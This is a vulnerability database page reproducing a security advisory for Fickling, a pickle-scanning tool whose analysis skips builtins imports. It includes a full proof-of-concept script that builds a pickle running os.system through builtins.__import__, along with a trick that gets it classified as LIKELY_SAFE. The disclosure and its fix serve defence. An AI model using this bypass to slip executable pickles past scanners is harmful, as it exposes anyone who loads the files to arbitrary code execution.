GHSA-H4RM-MM56-XF63

Vulnerability from github – Published: 2026-01-09 22:29 – Updated: 2026-01-09 22:29
VLAI?
Summary
Fickling vulnerable to detection bypass due to "builtins" blindness
Details

Fickling's assessment

Fickling started emitting AST nodes for builtins imports in order to match them during analysis (https://github.com/trailofbits/fickling/commit/9f309ab834797f280cb5143a2f6f987579fa7cdf).

Original report

Summary

Fickling works by Pickle bytecode --> AST --> Security analysis However while going from bytecode to AST, some import nodes are removed which blinds the security analysis

fickling/fickling/fickle.py

    def run(self, interpreter: Interpreter):
        module, attr = self.module, self.attr
        if module in ("__builtin__", "__builtins__", "builtins"):
            # no need to emit an import for builtins!
            pass
        else:
            alias = ast.alias(attr)
            interpreter.module_body.append(ast.ImportFrom(module=module, names=[alias], level=0))
        interpreter.stack.append(ast.Name(attr, ast.Load()))

    def encode(self) -> bytes:
        return f"c{self.module}\n{self.attr}\n".encode()

Here we see that no import nodes are emitted for builtins However builtins is marked as an unsafe import

fickling/fickling/analysis.py

UNSAFE_MODULES = {
        "__builtin__": "This module contains dangerous functions that can execute arbitrary code.",
        "__builtins__": "This module contains dangerous functions that can execute arbitrary code.",
        "builtins": "This module contains dangerous functions that can execute arbitrary code.",

But because there are no import nodes for builtins (they werent emitted when making the AST), the security scanner is effectively blind.

This can allow for security bypasses like this

poc.py (script to create payload)

import os

GLOBAL = b'c'    # Import module.name
STRING = b'S'    # Push string
TUPLE1 = b'\x85' # Build tuple of 1
TUPLE2 = b'\x86' # Build tuple of 2
EMPTY_TUPLE = b')'
REDUCE = b'R'    # Call function
PUT    = b'p'    # Memoize (Variable assignment)
GET    = b'g'    # Load from memo (Variable usage)
POP    = b'0'    # Discard top of stack
EMPTY_DICT = b'}'
SETITEM = b's'   # Add key/value to dict
BUILD  = b'b'    # Update object state (Liveness satisfy)
STOP   = b'.'    # Finish and return stack top

def generate_raw_payload():
    payload = b""

    payload += GLOBAL + b"builtins\n__import__\n"
    payload += STRING + b"'os'\n"
    payload += TUPLE1 + REDUCE
    payload += PUT + b"0\n" # _var0 = os module
    payload += POP

    payload += GLOBAL + b"builtins\ngetattr\n"
    payload += GET + b"0\n" # os module
    payload += STRING + b"'system'\n"
    payload += TUPLE2 + REDUCE
    payload += PUT + b"1\n" # _var1 = os.system
    payload += POP

    payload += GET + b"1\n" # os.system
    payload += STRING + b"'whoami'\n" # COMMAND
    payload += TUPLE1 + REDUCE
    payload += PUT + b"2\n" 
    payload += POP

    payload += GLOBAL + b"builtins\nException\n"
    payload += EMPTY_TUPLE + REDUCE
    payload += PUT + b"3\n"

    payload += EMPTY_DICT
    payload += STRING + b"'rce_status'\n"
    payload += GET + b"2\n" 
    payload += SETITEM  

    payload += BUILD

    payload += STOP

    return payload

if __name__ == "__main__":
    data = generate_raw_payload()
    with open("raw_bypass.pkl", "wb") as f:
        f.write(data)

    print("Generated 'raw_bypass.pkl'")

This creates a pickle file which imports the OS module using import which is a part of builtins. if the security scanner wasnt blinded it would have been flagged immidiately.

However now fickling sees the pickle payload as

_var0 = __import__('os')
_var1 = getattr(_var0, 'system')
_var2 = _var1('whoami')
_var3 = Exception()
_var4 = _var3
_var4.__setstate__({'rce_status': _var2})
result0 = _var4

image

As you can see there is no mention of builtins anywhere so it isnt flagged

Additionally, the payload builder uses a technique to ensure that no variable get flagged as "UNUSED" We deceive the data flow analysis heuristic by using the BUILD opcode to update an objects internal state. By taking the result of os.system (the exit code) and using it as a value in a dictionary that is then "built" into a returned exception object, we create a logical dependency chain.

The end result is that the malicious pickle gets classified as LIKELY_SAFE

Fixes: Ensure that import objects are emitted for imports from builtins depending on what those imports are, say emit import nodes for dangerous functions like __import__ while not emitting for stuff like dict()

Severity ?
8.9 (High)
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.1.6"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "fickling"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.1.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-22612"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-09T22:29:02Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "#Fickling\u0027s assessment\n\nFickling started emitting AST nodes for builtins imports in order to match them during analysis (https://github.com/trailofbits/fickling/commit/9f309ab834797f280cb5143a2f6f987579fa7cdf). \n\n# Original report\n\n### Summary\nFickling works by\nPickle bytecode --\u003e AST --\u003e Security analysis\nHowever while going from bytecode to AST, some import nodes are removed which blinds the security analysis\n\nfickling/fickling/fickle.py\n```python\n    def run(self, interpreter: Interpreter):\n        module, attr = self.module, self.attr\n        if module in (\"__builtin__\", \"__builtins__\", \"builtins\"):\n            # no need to emit an import for builtins!\n            pass\n        else:\n            alias = ast.alias(attr)\n            interpreter.module_body.append(ast.ImportFrom(module=module, names=[alias], level=0))\n        interpreter.stack.append(ast.Name(attr, ast.Load()))\n\n    def encode(self) -\u003e bytes:\n        return f\"c{self.module}\\n{self.attr}\\n\".encode()\n```\nHere we see that no import nodes are emitted for builtins\nHowever builtins is marked as an unsafe import\n\nfickling/fickling/analysis.py\n```python\nUNSAFE_MODULES = {\n        \"__builtin__\": \"This module contains dangerous functions that can execute arbitrary code.\",\n        \"__builtins__\": \"This module contains dangerous functions that can execute arbitrary code.\",\n        \"builtins\": \"This module contains dangerous functions that can execute arbitrary code.\",\n```\n\nBut because there are no import nodes for builtins (they werent emitted when making the AST), the security scanner is effectively blind.\n\nThis can allow for security bypasses like this\n\npoc.py (script to create payload)\n```python\nimport os\n\nGLOBAL = b\u0027c\u0027    # Import module.name\nSTRING = b\u0027S\u0027    # Push string\nTUPLE1 = b\u0027\\x85\u0027 # Build tuple of 1\nTUPLE2 = b\u0027\\x86\u0027 # Build tuple of 2\nEMPTY_TUPLE = b\u0027)\u0027\nREDUCE = b\u0027R\u0027    # Call function\nPUT    = b\u0027p\u0027    # Memoize (Variable assignment)\nGET    = b\u0027g\u0027    # Load from memo (Variable usage)\nPOP    = b\u00270\u0027    # Discard top of stack\nEMPTY_DICT = b\u0027}\u0027\nSETITEM = b\u0027s\u0027   # Add key/value to dict\nBUILD  = b\u0027b\u0027    # Update object state (Liveness satisfy)\nSTOP   = b\u0027.\u0027    # Finish and return stack top\n\ndef generate_raw_payload():\n    payload = b\"\"\n\n    payload += GLOBAL + b\"builtins\\n__import__\\n\"\n    payload += STRING + b\"\u0027os\u0027\\n\"\n    payload += TUPLE1 + REDUCE\n    payload += PUT + b\"0\\n\" # _var0 = os module\n    payload += POP\n\n    payload += GLOBAL + b\"builtins\\ngetattr\\n\"\n    payload += GET + b\"0\\n\" # os module\n    payload += STRING + b\"\u0027system\u0027\\n\"\n    payload += TUPLE2 + REDUCE\n    payload += PUT + b\"1\\n\" # _var1 = os.system\n    payload += POP\n\n    payload += GET + b\"1\\n\" # os.system\n    payload += STRING + b\"\u0027whoami\u0027\\n\" # COMMAND\n    payload += TUPLE1 + REDUCE\n    payload += PUT + b\"2\\n\" \n    payload += POP\n\n    payload += GLOBAL + b\"builtins\\nException\\n\"\n    payload += EMPTY_TUPLE + REDUCE\n    payload += PUT + b\"3\\n\"\n    \n    payload += EMPTY_DICT\n    payload += STRING + b\"\u0027rce_status\u0027\\n\"\n    payload += GET + b\"2\\n\" \n    payload += SETITEM  \n    \n    payload += BUILD\n    \n    payload += STOP\n\n    return payload\n\nif __name__ == \"__main__\":\n    data = generate_raw_payload()\n    with open(\"raw_bypass.pkl\", \"wb\") as f:\n        f.write(data)\n    \n    print(\"Generated \u0027raw_bypass.pkl\u0027\")\n```\n\nThis creates a pickle file which imports the OS module using __import__ which is a part of builtins. if the security scanner wasnt blinded it would have been flagged immidiately.\n\nHowever now fickling sees the pickle payload as\n\n```python\n_var0 = __import__(\u0027os\u0027)\n_var1 = getattr(_var0, \u0027system\u0027)\n_var2 = _var1(\u0027whoami\u0027)\n_var3 = Exception()\n_var4 = _var3\n_var4.__setstate__({\u0027rce_status\u0027: _var2})\nresult0 = _var4\n```\n\n\u003cimg width=\"810\" height=\"182\" alt=\"image\" src=\"https://github.com/user-attachments/assets/5bfe8c34-7bc0-429f-83ce-d0c2f1928aca\" /\u003e\n\n\nAs you can see there is no mention of builtins anywhere so it isnt flagged\n\nAdditionally, the payload builder uses a technique to ensure that no variable get flagged as \"UNUSED\"\nWe deceive the data flow analysis heuristic by using the BUILD opcode to update an objects internal state. \nBy taking the result of os.system (the exit code) and using it as a value in a dictionary that is then \"built\" into a returned exception object, we create a logical dependency chain.\n\nThe end result is that the malicious pickle gets classified as LIKELY_SAFE\n\nFixes: \nEnsure that import objects are emitted for imports from builtins depending on what those imports are, say emit import nodes for dangerous functions like ```__import__``` while not emitting for stuff like ```dict()```",
  "id": "GHSA-h4rm-mm56-xf63",
  "modified": "2026-01-09T22:29:02Z",
  "published": "2026-01-09T22:29:02Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-h4rm-mm56-xf63"
    },
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/pull/195"
    },
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/commit/9f309ab834797f280cb5143a2f6f987579fa7cdf"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/trailofbits/fickling"
    },
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/blob/977b0769c13537cd96549c12bb537f05464cf09c/test/test_bypasses.py#L349"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Fickling vulnerable to detection bypass due to \"builtins\" blindness"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.